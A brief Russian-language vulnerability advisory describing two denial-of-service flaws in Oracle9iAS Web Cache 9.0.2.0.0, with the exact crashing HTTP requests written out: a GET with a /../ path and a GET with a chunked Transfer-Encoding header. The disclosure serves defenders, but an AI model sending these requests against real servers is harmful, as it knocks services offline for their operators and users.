Oracle Web Cache - часть Oracle Application Server. Web Cache server используется для кэширования запросов Web сервера. Обнаружено две возможности отказа в обслуживании, которые приведут к краху Web Cache службы. Обе уязвимости могут эксплуатироваться простым HTTP запросом.
1. HTTP GET запрос, содержащий хотя бы одну последовательность /../, приведет к аварийному завершению работы службы:
GET /../ HTTP/1.0
Host: whatever
[CRLF]
[CRLF]
2. Некорректный HTTP GET запрос приведет к краху Web Cache:
GET / HTTP/1.0
Host: whatever
Transfer-Encoding: chunked
[CRLF]
[CRLF]
Уязвимость обнаружена в Oracle9iAS Web Cache 9.0.2.0.0.
